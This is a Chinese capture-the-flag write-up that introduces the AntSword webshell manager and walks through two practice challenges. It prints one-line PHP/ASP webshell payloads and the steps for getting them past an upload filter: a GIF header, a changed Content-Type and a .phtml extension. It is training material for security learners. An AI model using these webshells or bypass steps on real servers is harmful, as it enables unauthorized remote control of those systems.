[网络安全]AntSword(蚁剑)实战解题详析(入门)

免责声明:本文仅分享AntSword渗透相关知识,不承担任何法律责任。
请读者自行安装蚁剑,本文不再赘述。

蚁剑介绍

蚁剑(AntSword)是一款开源的跨平台WebShell管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。

中国蚁剑的特点主要有如下几点:

复制代码
1.支持多平台。包括macOS、Linux 32位、Linux 64位、Linux armv7l、Linux arm64、Windows 32位、Windows 64位。
2.完善的文档。中国蚁剑文档地址。
3.多项功能。文件管理功能、虚拟终端功能、数据库管理功能。
4.内置代理功能。支持HTTP、HTTPS、SOCKS4、SOCKS5四种代理协议。使用代理,可以连接处于内网中的Shell、加快连接速度、隐藏自身、与 BurpSuite 等工具配合使用等。
5.编码器和解码器。用于蚁剑客户端和Shell服务端通信时的加密、编码操作,可用于绕过WAF。
6.高扩展性。
    i插件。具有插件仓库,也可以自己开发插件。
    ii自定义编码器和解码器。

蚁剑官方文档


接下来进入解题详析

1 [极客大挑战 2019]Knife

思路

明显地,输入URL及密码Syc即可。

操作

  1. 输入URL及密码Syc并测试连接
  1. 添加数据成功后点击文件管理,在根目录找到flag

2 [极客大挑战 2019] Upload

文件上传漏洞

文件上传漏洞是指利用网页上传口的一些漏洞,上传诸如一句话木马等带有危险性的文件去进入目标服务器。

文件上传题目,一般都是绕过服务器设下的各种拦截措施上传木马文件,再利用类如菜刀蚁剑等设备连接服务器进行操作。

思路

上传一句话木马文件,使用蚁剑连接服务器。

操作

  1. qiushuo.txt中写入一句话木马,修改文件格式为php并上传。

回显Not image!,说明文件格式不符。

  1. 将文件格式改为jpg,上传。

回显NO! HACKER! your file included '<?',说明题目对<?进行过滤

  1. 更换一句话木马为<%execute(request("value"))%>

回显Don't lie to me, it's not image at all!!!,说明题目还对图片头进行校验。

  1. 更改图片头

将一句话木马改为:

复制代码
GIF89a
<script language="php">eval($_POST['qiushuo']);</script> 

上传成功:

  1. 抓包,修改文件后缀名

由于请求包限制Content-Type为image/jpeg,而image/jpeg文件不可被解析。此时需要绕过后缀,常见绕过后缀的文件格式有php,php3,php4,php5,phtml,pht

尝试修改文件后缀为pht,上传失败。
在尝试php、php3、php4、php5后,将文件名由qiushuo.jpg修改为qiushuo.phtml,回显成功:

  1. 进入图片保存路径,一般为/upload.filename

找到该文件:得到该文件URL地址。

  1. 连接蚁剑

于根目录找到flag文件:

相关推荐
向哆哆39 分钟前
Java 安全:如何防止 DDoS 攻击?
java·安全·ddos
星哥说事1 小时前
使用开源免费雷池WAF防火墙,接入保护你的网站
web安全·开源
浩浩测试一下1 小时前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
浩浩测试一下4 小时前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构
帅云毅6 小时前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
迷路的小绅士8 小时前
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略
网络·web安全·ddos
极小狐8 小时前
极狐GitLab 项目功能和权限解读
运维·git·安全·gitlab·极狐gitlab
国科安芯9 小时前
面向高性能运动控制的MCU:架构创新、算法优化与应用分析
单片机·嵌入式硬件·安全·架构·机器人·汽车·risc-v
ALe要立志成为web糕手10 小时前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
迷路的小绅士11 小时前
常见网络安全攻击类型深度剖析(四):跨站脚本攻击(XSS)——分类、漏洞利用与前端安全防护
前端·安全·web安全